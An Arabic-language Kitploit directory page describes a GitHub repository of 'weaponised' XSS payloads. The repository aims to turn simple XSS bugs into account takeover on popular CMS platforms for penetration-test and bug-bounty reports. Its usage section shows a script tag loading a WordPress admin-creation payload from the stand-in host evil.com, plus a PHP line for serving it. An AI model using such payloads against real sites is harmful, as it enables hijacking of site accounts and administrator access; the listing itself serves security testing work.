Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
weaponised-XSS-payloads — XSS payloads designed to turn alert(1) into P1 | Kitploit
أدوات/GitHubGitHub/hakluke/weaponised-xss-payloads
Payload GenerationExploitationWeb Application ExploitationWeb SecurityPenetration TestingPayload Development
GitHubhakluke/weaponised-xss-payloads

weaponised-XSS-payloads

XSS payloads designed to turn alert(1) into P1

عرض المستودع
1.4k222منذ 2 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

حمولات XSS المسلّحة

حمولات XSS مصممة لتحويل alert(1) إلى P1.

مقالة المدونة

تم نشر هذا المستودع إلى جانب مقالة بعنوان "كيفية ترقية ثغرات XSS من Medium إلى Critical" https://medium.com/@hakluke/upgrade-xss-from-medium-to-critical-cb96597b6cc4

ما هذا؟

في هذا المستودع ستجد مجموعة من ملفات JavaScript يمكن تحميلها في حمولة XSS لتنفيذ وظائف حسّاسة على منصات CMS الشهيرة في سياق متصفح الضحية. يمكن أن يساعد ذلك في ربط ثغرة XSS بسيطة بشيء أكثر خطورة، مثل الاستيلاء على الحساب.

هذا مثالي لتعزيز خطورة تقرير اختبار الاختراق أو برنامج مكافآت الثغرات من خلال إظهار تأثير أمني حقيقي.

يتم إضافة الحمولات تدريجيًا كلما توفر لدي الوقت. هناك الكثير قادم، وإذا كنت تستطيع المساعدة، فنرحب بطلبات السحب (pull requests)! إذا كنت تبحث عن إلهام حول ما يجب إنشاؤه، فتحقق من تبويب "issues" في هذا المستودع.

طريقة الاستخدام

أبسط طريقة لاستخدام هذه الحمولات هي استضافتها في مكان ما وتحميلها في خاصية src لوسم script الخاص بحمولة XSS كالتالي:

root@kitploit:~
<script src="http://evil.com/wordpress_create_admin_user.js"></script>

بدلاً من ذلك، اعتمادًا على سياق الحمولة وطولها، يمكن أحيانًا تصغيرها أو ترميزها ثم تضمينها مباشرة في الطلب.

لاستضافة ملف JavaScript، قد تحتاج إلى ضبط Content-Type على application/javascript. لتحقيق ذلك باستخدام PHP، يمكنك ببساطة إضافة هذا السطر في أعلى أي من الحمولات، وحفظه كملف .php واستضافته على خادم الويب الذي يدعم PHP:

root@kitploit:~
<?php header("Content-Type: application/javascript"); ?>

الاعتمادات

هذه المقالة من Shift8 هي ما ألهمني لإنشاء هذا المستودع. يحتوي كود JS في المقالة على بعض الأخطاء المطبعية البسيطة، لكن المفاهيم دقيقة في محلها.

تنزيل الأداة